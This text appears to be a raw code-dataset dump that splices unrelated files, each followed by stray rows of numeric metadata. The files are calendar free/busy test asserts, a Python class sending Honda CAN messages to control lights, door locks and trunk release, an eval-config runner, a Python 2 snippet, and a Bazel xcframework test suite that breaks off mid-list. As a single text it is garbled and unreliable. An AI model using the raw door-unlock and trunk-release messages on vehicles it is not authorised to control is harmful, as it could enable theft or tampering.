'2016-11-17T00:00:00-08:00', 'summary': 'Free'}], [{'end': '2016-11-18T23:59:00-08:00', 'start': '2016-11-18T00:00:00-08:00', 'summary': 'Free'}]] assert(addFree(bBlocks, sTime, eTime, sDate, eDate) == fBSorted) #Test2 - single event bBlocks = [[{'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00', 'summary': 'Busy'}]] sTime = "2016-01-01T00:00:00-08:00" eTime = "2016-01-01T23:59:00-08:00" sDate = "2016-11-17T00:00:00-08:00" eDate = "2016-11-18T00:00:00-08:00" fBSorted = [[{'end': '2016-11-17T18:00:00-08:00', 'start': '2016-11-17T00:00:00-08:00', 'summary': 'Free'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T18:00:00-08:00', 'summary': 'Busy'}, {'end': '2016-11-17T23:59:00-08:00', 'start': '2016-11-17T19:00:00-08:00', 'summary': 'Free'}], [{'end': '2016-11-18T23:59:00-08:00', 'start': '2016-11-18T00:00:00-08:00', 'summary': 'Free'}]] assert(addFree(bBlocks, sTime, eTime, sDate, eDate) == fBSorted) #Test3 - overlapping events bBlocks = [[{'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T17:45:00-08:00', 'summary': 'Busy'}], [{'end': '2016-11-18T17:00:00-08:00', 'start': '2016-11-18T16:00:00-08:00', 'summary': 'Busy'}]] sTime = "2016-01-01T00:00:00-08:00" eTime = "2016-01-01T23:59:00-08:00" sDate = "2016-11-17T00:00:00-08:00" eDate = "2016-11-18T00:00:00-08:00" fBSorted = [[{'end': '2016-11-17T17:45:00-08:00', 'start': '2016-11-17T00:00:00-08:00', 'summary': 'Free'}, {'end': '2016-11-17T19:00:00-08:00', 'start': '2016-11-17T17:45:00-08:00', 'summary': 'Busy'}, {'end': '2016-11-17T23:59:00-08:00', 'start': '2016-11-17T19:00:00-08:00', 'summary': 'Free'}], [{'end': '2016-11-18T16:00:00-08:00', 'start': '2016-11-18T00:00:00-08:00', 'summary': 'Free'}, {'end': '2016-11-18T17:00:00-08:00', 'start': '2016-11-18T16:00:00-08:00', 'summary': 'Busy'}, {'end': '2016-11-18T23:59:00-08:00', 'start': '2016-11-18T17:00:00-08:00', 'summary': 'Free'}]] assert(addFree(bBlocks, sTime, eTime, sDate, eDate) == fBSorted)
78.139241
968
0.654787
921
6,173
4.378936
0.127036
0.075378
0.113067
0.1091
0.888916
0.865609
0.865609
0.840317
0.821721
0.818993
0
0.290825
0.094282
6,173
78
969
79.141026
0.430513
0.042929
0
0.479167
0
0
0.61558
0.397488
0
0
0
0
0.208333
1
0.083333
false
0
0.020833
0
0.104167
0
0
0
0
null
0
0
0
1
1
1
1
1
1
0
1
0
0
0
0
0
1
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
a8e66bca30493a897474cbd828a55b935d9c7ea4
2,809
py
Python
honda/__init__.py
gregjhogan/openioc
d79b17dfe8b6780f8ade248f14264061fe40e630
[ "MIT" ]
17
2020-08-10T00:21:39.000Z
2022-02-19T14:02:24.000Z
honda/__init__.py
gregjhogan/openioc
d79b17dfe8b6780f8ade248f14264061fe40e630
[ "MIT" ]
1
2021-06-05T16:00:39.000Z
2021-06-06T01:53:56.000Z
honda/__init__.py
gregjhogan/openioc
d79b17dfe8b6780f8ade248f14264061fe40e630
[ "MIT" ]
5
2020-08-09T05:30:43.000Z
2021-08-05T12:40:31.000Z
class HondaInputOutputController: def __init__(self, send_func): self.send = send_func def left_turn_signal(self, on): if on: msg = b"\x30\x0a\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def right_turn_signal(self, on): if on: msg = b"\x30\x0b\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def hazard_lights(self, on): if on: msg = b"\x30\x08\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def parking_lights(self, on): if on: msg = b"\x30\x25\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def headlight_low_beams(self, on): if on: msg = b"\x30\x1c\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def headlight_high_beams(self, on): if on: msg = b"\x30\x1d\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def front_fog_lights(self, on): if on: msg = b"\x30\x20\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def daytime_running_lights(self, on): if on: msg = b"\x30\x36\x0f\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def lock_all_doors(self): self.send(0x16f118f0, b"\x30\x04\x01\x00\x00\x00\x00\x00") def unlock_all_doors(self): self.send(0x16f118f0, b"\x30\x05\x01\x00\x00\x00\x00\x00") def unlock_all_doors_alt(self): self.send(0x16f118f0, b"\x30\x06\x01\x00\x00\x00\x00\x00") def trunk_release(self): self.send(0x16f118f0, b"\x30\x09\x01\x00\x00\x00\x00\x00") def front_wipers_slow(self, on): if on: msg = b"\x30\x19\x05\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def front_wipers_fast(self, on): if on: msg = b"\x30\x1a\x05\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def front_washer_pump(self, on): if on: msg = b"\x30\x1b\x05\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def rear_wiper(self, on): if on: msg = b"\x30\x0d\x05\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def rear_washer_pump(self, on): if on: msg = b"\x30\x0e\x05\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f118f0, msg) def left_blindspot_flash(self, on): if on: msg = b"\x30\x01\x08\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f19ff0, msg) def right_blindspot_flash(self, on): if on: msg = b"\x30\x01\x08\x00\x00\x00\x00\x00" else: msg = b"\x20" self.send(0x16f1a7f0, msg)
23.02459
62
0.599858
466
2,809
3.527897
0.143777
0.277372
0.312044
0.277372
0.846107
0.846107
0.814477
0.757908
0.638686
0.572993
0
0.210304
0.239943
2,809
121
63
23.214876
0.559719
0
0
0.594059
0
0
0.237892
0.216524
0
0
0.067664
0
0
1
0.19802
false
0
0
0
0.207921
0
0
0
0
null
1
1
1
1
1
1
1
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
8
0f93157fe609a37371eaf51c980572bb6d401bf5
540
py
Python
eval_mosmed_timm-regnetx_002_GridDistortion.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
eval_mosmed_timm-regnetx_002_GridDistortion.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
eval_mosmed_timm-regnetx_002_GridDistortion.py
BrunoKrinski/segtool
cb604b5f38104c43a76450136e37c3d1c4b6d275
[ "MIT" ]
null
null
null
import os ls=["python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_0_GridDistortion.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_1_GridDistortion.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_2_GridDistortion.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_3_GridDistortion.yml", "python main.py --configs configs/eval_mosmed_unetplusplus_timm-regnetx_002_4_GridDistortion.yml", ] for l in ls: os.system(l)
49.090909
102
0.846296
80
540
5.3375
0.3
0.117096
0.140515
0.222482
0.885246
0.885246
0.885246
0.885246
0.885246
0.885246
0
0.039293
0.057407
540
11
103
49.090909
0.799607
0
0
0
0
0
0.878004
0.64695
0
0
0
0
0
1
0
false
0
0.111111
0
0.111111
0
0
0
0
null
0
0
1
1
1
1
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
1
1
null
0
0
0
0
0
0
0
0
0
0
0
0
0
9
7e66fd54ec4030243ee98fbe7fa0d7dbb704af29
79
py
Python
models/__init__.py
mengjian0502/EEE598_FinalProj
6e4b8d0ec79eb3e7aa982f85ecadb7f36cdd7a84
[ "MIT" ]
null
null
null
models/__init__.py
mengjian0502/EEE598_FinalProj
6e4b8d0ec79eb3e7aa982f85ecadb7f36cdd7a84
[ "MIT" ]
null
null
null
models/__init__.py
mengjian0502/EEE598_FinalProj
6e4b8d0ec79eb3e7aa982f85ecadb7f36cdd7a84
[ "MIT" ]
null
null
null
from .mlp import * from .cnn import * from .cnn_q import * from .cnn_b import *
19.75
20
0.708861
14
79
3.857143
0.428571
0.555556
0.722222
0
0
0
0
0
0
0
0
0
0.189873
79
4
21
19.75
0.84375
0
0
0
0
0
0
0
0
0
0
0
0
1
0
true
0
1
0
1
0
1
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
1
0
1
0
0
7
7e76ba567331748655a10d91424f5794a91edf62
22
py
Python
2017.TensorFlow&Python/2.python_syntax/test1.py
primetong/LearningCollectionOfWitt
a15dc8ac80618a3995c2b930c634b87ed8f1f0af
[ "MIT" ]
null
null
null
2017.TensorFlow&Python/2.python_syntax/test1.py
primetong/LearningCollectionOfWitt
a15dc8ac80618a3995c2b930c634b87ed8f1f0af
[ "MIT" ]
14
2020-06-30T20:52:56.000Z
2022-03-02T14:53:18.000Z
2017.TensorFlow&Python/2.python_syntax/test1.py
primetong/LearningCollectionOfWitt
a15dc8ac80618a3995c2b930c634b87ed8f1f0af
[ "MIT" ]
null
null
null
a = 200 + 300 print a
7.333333
13
0.590909
5
22
2.6
0.8
0
0
0
0
0
0
0
0
0
0
0.4
0.318182
22
2
14
11
0.466667
0
0
0
0
0
0
0
0
0
0
0
0
0
null
null
0
0
null
null
0.5
1
1
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
1
0
0
0
0
0
0
1
0
7
7e7783c980dfe609c2d5e8d775274e7581af31d2
24,193
bzl
Python
test/starlark_tests/apple_xcframework_tests.bzl
mattrobmattrob/rules_apple
4ebd7cc45edfe6c525c1553a0f5294895653c9df
[ "Apache-2.0" ]
null
null
null
test/starlark_tests/apple_xcframework_tests.bzl
mattrobmattrob/rules_apple
4ebd7cc45edfe6c525c1553a0f5294895653c9df
[ "Apache-2.0" ]
null
null
null
test/starlark_tests/apple_xcframework_tests.bzl
mattrobmattrob/rules_apple
4ebd7cc45edfe6c525c1553a0f5294895653c9df
[ "Apache-2.0" ]
null
null
null
# Copyright 2021 The Bazel Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """xcframework Starlark tests.""" load( ":rules/common_verification_tests.bzl", "archive_contents_test", "bitcode_symbol_map_test", ) load( ":rules/dsyms_test.bzl", "dsyms_test", ) load( ":rules/infoplist_contents_test.bzl", "infoplist_contents_test", ) load( ":rules/linkmap_test.bzl", "linkmap_test", ) def apple_xcframework_test_suite(name): """Test suite for apple_xcframework. Args: name: the base name to be used in things created by this macro """ infoplist_contents_test( name = "{}_ios_plist_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", expected_values = { "AvailableLibraries:0:LibraryIdentifier": "ios-arm64", "AvailableLibraries:0:LibraryPath": "ios_dynamic_xcframework.framework", "AvailableLibraries:0:SupportedArchitectures:0": "arm64", "AvailableLibraries:0:SupportedPlatform": "ios", "AvailableLibraries:1:LibraryIdentifier": "ios-x86_64-simulator", "AvailableLibraries:1:LibraryPath": "ios_dynamic_xcframework.framework", "AvailableLibraries:1:SupportedArchitectures:0": "x86_64", "AvailableLibraries:1:SupportedPlatform": "ios", "AvailableLibraries:1:SupportedPlatformVariant": "simulator", "CFBundlePackageType": "XFWK", "XCFrameworkFormatVersion": "1.0", }, not_expected_keys = [ "AvailableLibraries:0:BitcodeSymbolMapsPath", "AvailableLibraries:1:BitcodeSymbolMapsPath", ], tags = [name], ) infoplist_contents_test( name = "{}_ios_fat_plist_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", expected_values = { "AvailableLibraries:0:LibraryIdentifier": "ios-arm64_armv7", "AvailableLibraries:0:LibraryPath": "ios_dynamic_lipoed_xcframework.framework", "AvailableLibraries:0:SupportedArchitectures:0": "arm64", "AvailableLibraries:0:SupportedArchitectures:1": "armv7", "AvailableLibraries:0:SupportedPlatform": "ios", "AvailableLibraries:1:LibraryIdentifier": "ios-i386_arm64_x86_64-simulator", "AvailableLibraries:1:LibraryPath": "ios_dynamic_lipoed_xcframework.framework", "AvailableLibraries:1:SupportedArchitectures:0": "i386", "AvailableLibraries:1:SupportedArchitectures:1": "arm64", "AvailableLibraries:1:SupportedArchitectures:2": "x86_64", "AvailableLibraries:1:SupportedPlatform": "ios", "AvailableLibraries:1:SupportedPlatformVariant": "simulator", "CFBundlePackageType": "XFWK", "XCFrameworkFormatVersion": "1.0", }, not_expected_keys = [ "AvailableLibraries:0:BitcodeSymbolMapsPath", "AvailableLibraries:1:BitcodeSymbolMapsPath", ], tags = [name], ) infoplist_contents_test( name = "{}_ios_plist_bitcode_test".format(name), apple_bitcode = "embedded", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", expected_values = { "AvailableLibraries:0:LibraryIdentifier": "ios-arm64", "AvailableLibraries:0:BitcodeSymbolMapsPath": "BCSymbolMaps", "AvailableLibraries:1:LibraryIdentifier": "ios-x86_64-simulator", }, not_expected_keys = [ "AvailableLibraries:1:BitcodeSymbolMapsPath", ], tags = [name], ) infoplist_contents_test( name = "{}_ios_fat_plist_bitcode_test".format(name), apple_bitcode = "embedded", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", expected_values = { "AvailableLibraries:0:LibraryIdentifier": "ios-arm64_armv7", "AvailableLibraries:0:BitcodeSymbolMapsPath": "BCSymbolMaps", "AvailableLibraries:1:LibraryIdentifier": "ios-i386_arm64_x86_64-simulator", }, not_expected_keys = [ "AvailableLibraries:1:BitcodeSymbolMapsPath", ], tags = [name], ) archive_contents_test( name = "{}_ios_arm64_device_archive_contents_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", binary_test_file = "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/ios_dynamic_xcframework", macho_load_commands_contain = ["name @rpath/ios_dynamic_xcframework.framework/ios_dynamic_xcframework (offset 24)"], contains = [ "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Headers/shared.h", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Headers/ios_dynamic_xcframework.h", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Modules/module.modulemap", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/ios_dynamic_xcframework", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework.framework/Info.plist", "$BUNDLE_ROOT/Info.plist", ], tags = [name], ) archive_contents_test( name = "{}_ios_x86_64_sim_archive_contents_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/ios_dynamic_xcframework", macho_load_commands_contain = ["name @rpath/ios_dynamic_xcframework.framework/ios_dynamic_xcframework (offset 24)"], contains = [ "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Headers/shared.h", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Headers/ios_dynamic_xcframework.h", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Modules/module.modulemap", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/ios_dynamic_xcframework", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework.framework/Info.plist", "$BUNDLE_ROOT/Info.plist", ], tags = [name], ) archive_contents_test( name = "{}_ios_fat_device_archive_contents_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", binary_test_file = "$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework", macho_load_commands_contain = ["name @rpath/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework (offset 24)"], contains = [ "$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Headers/shared.h", "$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Headers/ios_dynamic_lipoed_xcframework.h", "$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Modules/module.modulemap", "$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework", "$BUNDLE_ROOT/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/Info.plist", "$BUNDLE_ROOT/Info.plist", ], tags = [name], ) archive_contents_test( name = "{}_ios_fat_sim_archive_contents_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", binary_test_file = "$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework", macho_load_commands_contain = ["name @rpath/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework (offset 24)"], contains = [ "$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Headers/shared.h", "$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Headers/ios_dynamic_lipoed_xcframework.h", "$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Modules/module.modulemap", "$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework", "$BUNDLE_ROOT/ios-i386_arm64_x86_64-simulator/ios_dynamic_lipoed_xcframework.framework/Info.plist", "$BUNDLE_ROOT/Info.plist", ], tags = [name], ) dsyms_test( name = "{}_device_dsyms_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", expected_dsyms = ["ios_dynamic_xcframework_ios_device.framework"], architectures = ["arm64"], tags = [name], ) dsyms_test( name = "{}_simulator_dsyms_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", expected_dsyms = ["ios_dynamic_xcframework_ios_simulator.framework"], architectures = ["x86_64"], tags = [name], ) dsyms_test( name = "{}_fat_device_dsyms_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", expected_dsyms = ["ios_dynamic_lipoed_xcframework_ios_device.framework"], architectures = ["arm64", "armv7"], tags = [name], ) dsyms_test( name = "{}_fat_simulator_dsyms_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", expected_dsyms = ["ios_dynamic_lipoed_xcframework_ios_simulator.framework"], architectures = ["x86_64", "arm64", "i386"], tags = [name], ) linkmap_test( name = "{}_device_linkmap_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", expected_linkmap_names = ["ios_dynamic_xcframework_ios_device"], architectures = ["arm64"], tags = [name], ) linkmap_test( name = "{}_simulator_linkmap_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", expected_linkmap_names = ["ios_dynamic_xcframework_ios_simulator"], architectures = ["x86_64"], tags = [name], ) linkmap_test( name = "{}_fat_device_linkmap_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", expected_linkmap_names = ["ios_dynamic_lipoed_xcframework_ios_device"], architectures = ["arm64", "armv7"], tags = [name], ) linkmap_test( name = "{}_fat_simulator_linkmap_test".format(name), target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", expected_linkmap_names = ["ios_dynamic_lipoed_xcframework_ios_simulator"], architectures = ["x86_64", "arm64", "i386"], tags = [name], ) bitcode_symbol_map_test( name = "{}_archive_contains_bitcode_symbol_maps_test".format(name), bc_symbol_maps_root = "ios_dynamic_xcframework.xcframework/ios-arm64", binary_paths = [ "ios_dynamic_xcframework.xcframework/ios-arm64/ios_dynamic_xcframework.framework/ios_dynamic_xcframework", ], target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework", tags = [name], ) bitcode_symbol_map_test( name = "{}_fat_archive_contains_bitcode_symbol_maps_test".format(name), bc_symbol_maps_root = "ios_dynamic_lipoed_xcframework.xcframework/ios-arm64_armv7", binary_paths = [ "ios_dynamic_lipoed_xcframework.xcframework/ios-arm64_armv7/ios_dynamic_lipoed_xcframework.framework/ios_dynamic_lipoed_xcframework", ], target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_xcframework", tags = [name], ) # Tests that minimum os versions values are respected by the embedded frameworks. archive_contents_test( name = "{}_ios_minimum_os_versions_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_min_ver_10", plist_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_min_ver_10.framework/Info.plist", plist_test_values = { "MinimumOSVersion": "10.0", }, tags = [name], ) # Tests that options to override the device family (in this case, exclusively "ipad" for the iOS # platform) are respected by the embedded frameworks. archive_contents_test( name = "{}_ios_exclusively_ipad_device_family_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_exclusively_ipad_device_family", plist_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_exclusively_ipad_device_family.framework/Info.plist", plist_test_values = { "UIDeviceFamily:0": "2", }, tags = [name], ) # Tests that info plist merging is respected by XCFrameworks. archive_contents_test( name = "{}_multiple_infoplist_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_multiple_infoplists", plist_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_multiple_infoplists.framework/Info.plist", plist_test_values = { "AnotherKey": "AnotherValue", "CFBundleExecutable": "ios_dynamic_xcframework_multiple_infoplists", }, tags = [name], ) # Tests that resource bundles and files assigned through "data" are respected. archive_contents_test( name = "{}_dbg_resources_data_test".format(name), build_type = "device", compilation_mode = "dbg", is_binary_plist = [ "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist", ], is_not_binary_plist = [ "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist", ], target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_data_resource_bundle", tags = [name], ) archive_contents_test( name = "{}_opt_resources_data_test".format(name), build_type = "device", compilation_mode = "opt", is_binary_plist = [ "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/resource_bundle.bundle/Info.plist", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_data_resource_bundle.framework/Another.plist", ], target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_data_resource_bundle", tags = [name], ) # Tests that resource bundles assigned through "deps" are respected. archive_contents_test( name = "{}_dbg_resources_deps_test".format(name), build_type = "device", compilation_mode = "dbg", is_binary_plist = [ "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist", ], target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_deps_resource_bundle", tags = [name], ) archive_contents_test( name = "{}_opt_resources_deps_test".format(name), build_type = "device", compilation_mode = "opt", is_binary_plist = [ "$BUNDLE_ROOT/ios-arm64/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist", "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_with_deps_resource_bundle.framework/resource_bundle.bundle/Info.plist", ], target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_with_deps_resource_bundle", tags = [name], ) # Tests that the exported symbols list works for XCFrameworks. archive_contents_test( name = "{}_exported_symbols_lists_stripped_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_stripped", binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_stripped.framework/ios_dynamic_xcframework_stripped", compilation_mode = "opt", binary_test_architecture = "x86_64", binary_contains_symbols = ["_anotherFunctionShared"], binary_not_contains_symbols = ["_dontCallMeShared", "_anticipatedDeadCode"], tags = [name], ) # Tests that multiple exported symbols lists works for XCFrameworks. archive_contents_test( name = "{}_two_exported_symbols_lists_stripped_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_stripped_two_exported_symbols_lists", binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_stripped_two_exported_symbols_lists.framework/ios_dynamic_xcframework_stripped_two_exported_symbols_lists", compilation_mode = "opt", binary_test_architecture = "x86_64", binary_contains_symbols = ["_anotherFunctionShared", "_dontCallMeShared"], binary_not_contains_symbols = ["_anticipatedDeadCode"], tags = [name], ) # Tests that dead stripping + exported symbols lists works for XCFrameworks just as it does for # dynamic frameworks. archive_contents_test( name = "{}_exported_symbols_list_dead_stripped_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_xcframework_dead_stripped", binary_test_file = "$BUNDLE_ROOT/ios-x86_64-simulator/ios_dynamic_xcframework_dead_stripped.framework/ios_dynamic_xcframework_dead_stripped", compilation_mode = "opt", binary_test_architecture = "x86_64", binary_contains_symbols = ["_anotherFunctionShared"], binary_not_contains_symbols = ["_dontCallMeShared", "_anticipatedDeadCode"], tags = [name], ) # Tests that generated swift interfaces work for XCFrameworks when a swift_library is included. archive_contents_test( name = "{}_swift_interface_generation_test".format(name), build_type = "device", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_dynamic_lipoed_swift_xcframework", contains = [ "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftdoc", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftinterface", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/x86_64.swiftdoc", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/x86_64.swiftinterface", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/ios_dynamic_lipoed_swift_xcframework", "$BUNDLE_ROOT/ios-arm64_x86_64-simulator/ios_dynamic_lipoed_swift_xcframework.framework/Info.plist", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftdoc", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/Modules/ios_dynamic_lipoed_swift_xcframework.swiftmodule/arm64.swiftinterface", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/ios_dynamic_lipoed_swift_xcframework", "$BUNDLE_ROOT/ios-arm64/ios_dynamic_lipoed_swift_xcframework.framework/Info.plist", "$BUNDLE_ROOT/Info.plist", ], tags = [name], ) # Test that the Swift generated header is propagated to the Headers visible within this iOS # framework along with the swift interfaces and modulemap. archive_contents_test( name = "{}_swift_generates_header_test".format(name), build_type = "simulator", compilation_mode = "opt", target_under_test = "//test/starlark_tests/targets_under_test/apple:ios_swift_xcframework_with_generated_header", contains = [ 